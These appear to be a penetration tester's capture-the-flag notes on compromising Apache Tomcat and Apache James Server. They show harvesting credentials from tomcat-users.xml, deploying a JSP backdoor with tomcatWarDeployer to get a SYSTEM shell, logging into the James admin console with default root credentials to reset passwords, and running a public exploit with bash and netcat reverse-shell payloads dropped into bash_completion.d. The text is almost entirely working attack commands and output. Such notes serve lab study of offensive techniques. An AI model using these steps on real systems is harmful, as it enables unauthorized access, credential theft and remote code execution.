Copy /usr/local/www/apache24/data/
/var/log/httpd-error.log
/var/log/httpd-access.log
Copy Password is sometimes kept:
Directory where tomcat is installed
Directory starting with tomcat in /etc/
'tomcat-users.xml'
Example: /etc/tomcat7/tomcat-users.xml
Check: cat /etc/passwd .. see where tomcat profile lives
Copy Example:
> python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080
python error: no module named 'mechanize'
>> sudo apt install python-pip
>> pip install mechanize
Again with Creds:
>> sudo python ./tomcatWarDeployer.py -v -x --user=tomcat --pass=s3cret -n hello2 -p 4449 -H 10.10.14.189 10.10.10.95:8080
==== JSP Backdoor ====
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/hello2/
INFO:
Happy pwning. Here take that password for web shell: '8EWh0JeCrmN0'
INFO: ------------------------------------------------------------
SUCCESS!!!!!
http://10.10.10.95:8080/hello2/
8EWh0JeCrmN0
> whoami
nt authority\system
Copy
more C:\conf\tomcat-users.xml
more C:\apache-tomcat-7.0.88\tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<user username="tomcat" password="s3cret" roles="tomcat, manager-gui"/>
<user username="admin" password="admin" roles="role1, manager-status"/>
<user username="jerry" password="tomcat" roles="role1, manager-status"/>
</tomcat-users> Apache James Server 2.3.2
Copy nc $IP 4555
admin:admin ..fail
root:root ..ok
help
listusers
setpassword admin password
setpassword mindy password ..next use thunderbird to read emails
Copy -------------------------
searchsploit james
searchsploit -m linux/remote/35513.py
vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'
nc -nvlp 4444
python 35513.py $IP
ssh user@server ..to pop the exploit
-------------------------
james will
adduser ../../../etc/bash_completion.d
sends email to directory with our payload
when somebody logs in, payload gets executed 